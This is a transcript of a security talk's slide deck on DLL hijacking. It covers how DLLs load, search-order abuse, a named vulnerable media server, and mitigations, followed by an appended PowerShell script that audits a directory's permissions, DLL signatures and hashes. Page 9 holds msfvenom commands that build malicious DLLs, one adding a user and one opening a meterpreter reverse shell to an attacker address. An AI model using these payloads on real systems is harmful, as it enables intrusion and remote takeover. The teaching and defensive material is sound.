Dll Hijacking

Date post: 22-Feb-2017
Upload: nullowaspmumbai
Page 1: Dll Hijacking

DLL Hijacking

Page 2: Dll Hijacking

What is a Dll

Dynamic Link Libraries (DLLs) are like EXEs but they are not directly executable. That is to say, DLLs are Microsoft's implementation of shared libraries. DLLs are so much like an EXE that the file format itself is the same: both EXEs and DLLs are based on the Portable Executable (PE) file format.

Page 3: Dll Hijacking

Why use a Dll

In order to execute a program it must be loaded in main memory.

When an .exe runs, the whole file is copied into main memory. Using library functions dynamically lets the .exe stay smaller, because the functions are loaded and called only when required, so memory utilization is reduced.

Page 4: Dll Hijacking

Dynamic linking has the following advantages:

Saves memory and reduces swapping. Many processes can use a single DLL simultaneously, sharing a single copy of the DLL in memory. In contrast, Windows must load a copy of the library code into memory for each application that is built with a static link library.

Saves disk space. Many applications can share a single copy of the DLL on disk. In contrast, each application built with a static link library has the library code linked into its executable image as a separate copy.

Upgrades to the DLL are easier. When the functions in a DLL change, the applications that use them do not need to be recompiled or relinked as long as the function arguments and return values do not change. In contrast, statically linked object code requires that the application be relinked when the functions change.

Provides after-market support. For example, a display driver DLL can be modified to support a display that was not available when the application was shipped.

Page 5: Dll Hijacking

The Difference?

DLL Hijacking is when you abuse the library search order to gain execution in a process. When an executable asks for a library by file name only, the application's own directory is searched before the system directories, so being able to write to the directory an executable resides in allows a malicious actor to drop a DLL with the same name as one the executable will request via LoadLibrary. When the executable attempts to load the expected library, it will instead load the malicious one.

DLL Injection on the other hand is where a running process is manipulated to load a desired library. 

Page 6: Dll Hijacking

Vulnerable Application: Mezzmo (latest version)

Page 7: Dll Hijacking

How to Check?

Get a Dll that shows a message box or create one as per your requirement.

Replace the original Dll with the malicious one.

Trial and Error.

Page 8: Dll Hijacking

Automated Tool

Dll Hijack Auditor

Page 9: Dll Hijacking

Dll Crafting

Compile it yourself using code from Exploit-db.

Obtain a compiled Dll as a POC.

Use Metasploit to craft a malicious Dll:

msfvenom -p windows/adduser -i 30 -f dll > one.dll

msfvenom -p windows/meterpreter/reverse_tcp Lhost=10.0.0.140 Lport=443 -i 30 -f dll > two.dll

Page 10: Dll Hijacking

Mitigation

Use signed Dll's.

Dll encryption/obfuscation.

Integrity check using a checksum of the file.

Use a hard-coded (fully qualified) path when loading the Dll.
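Added example (my own script, not from these slides): a PowerShell audit that checks an application directory against the mitigations above, i.e. whether broad groups can write to it, whether each shipped DLL carries a valid Authenticode signature, and a SHA256 baseline so later runs flag DLLs that were added or replaced. The parameter names $AppDir and $BaselineCsv are my own choice.

```powershell
# Added example: audit an application directory for DLL hijacking exposure.
# Parameters $AppDir and $BaselineCsv are this script's own (assumed) names.
param(
    [Parameter(Mandatory = $true)][string]$AppDir,
    [string]$BaselineCsv = '.\dll-baseline.csv'
)
# 1. A writable install directory is the precondition for planting a DLL,
#    so flag ACEs that grant broad principals write access to it.
$broad = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone')
$writeMask = [System.Security.AccessControl.FileSystemRights]::WriteData -bor
             [System.Security.AccessControl.FileSystemRights]::AppendData
$writable = (Get-Acl -Path $AppDir).Access | Where-Object {
    $_.AccessControlType -eq 'Allow' -and
    $broad -contains $_.IdentityReference.Value -and
    (($_.FileSystemRights -band $writeMask) -ne 0)
}
if ($writable) {
    Write-Warning "$AppDir is writable by: $(($writable.IdentityReference.Value | Select-Object -Unique) -join ', ')"
}

# 2. Signature status and SHA256 for every DLL shipped with the application.
$report = Get-ChildItem -Path $AppDir -Filter *.dll -Recurse | ForEach-Object {
    $sig = Get-AuthenticodeSignature -FilePath $_.FullName
    [PSCustomObject]@{
        Dll    = $_.FullName
        Status = $sig.Status.ToString()   # Valid, NotSigned, HashMismatch, ...
        Signer = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '' }
        SHA256 = (Get-FileHash -Path $_.FullName -Algorithm SHA256).Hash
    }
}
$report | Format-Table -AutoSize
$report | Where-Object Status -ne 'Valid' |
    ForEach-Object { Write-Warning "Unsigned or invalid signature: $($_.Dll) ($($_.Status))" }

# 3. Integrity check: on the first run record a hash baseline; on later runs
#    report DLLs that appeared or whose hash changed since the baseline.
if (Test-Path $BaselineCsv) {
    $baseline = @{}
    Import-Csv -Path $BaselineCsv | ForEach-Object { $baseline[$_.Dll] = $_.SHA256 }
    foreach ($row in $report) {
        if (-not $baseline.ContainsKey($row.Dll)) {
            Write-Warning "New DLL not in baseline: $($row.Dll)"
        } elseif ($baseline[$row.Dll] -ne $row.SHA256) {
            Write-Warning "Hash changed since baseline: $($row.Dll)"
        }
    }
} else {
    $report | Export-Csv -Path $BaselineCsv -NoTypeInformation
}
```

Run it once to record the baseline, then re-run after updates or on a schedule; a DLL that is unsigned, newly present, or hash-changed in a directory that Users can write to is the condition the slides describe.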

Page 11: Dll Hijacking
